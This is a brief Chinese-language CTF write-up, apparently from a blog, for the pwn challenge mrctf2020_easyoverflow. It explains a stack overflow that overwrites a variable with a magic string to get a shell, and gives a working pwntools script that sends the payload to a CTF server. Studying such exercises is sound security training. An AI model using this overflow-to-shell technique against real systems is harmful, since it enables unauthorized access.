mrctf2020_easyoverflow

mrctf2020_easyoverflow

查看保护
mrctf2020_easyoverflow
mrctf2020_easyoverflow
有个溢出,可以覆盖掉v5。v5等于n0t_r3@11y_f1@g即可get_shell。所以溢出改v5就行。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 26447)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

p1 = b'a' * 0x30 + b'n0t_r3@11y_f1@g'

r.sendline(p1)

r.interactive()
上一篇:android系统框架


下一篇:(转)5个案例详解装饰器 | 手把手教你入门Python之四十六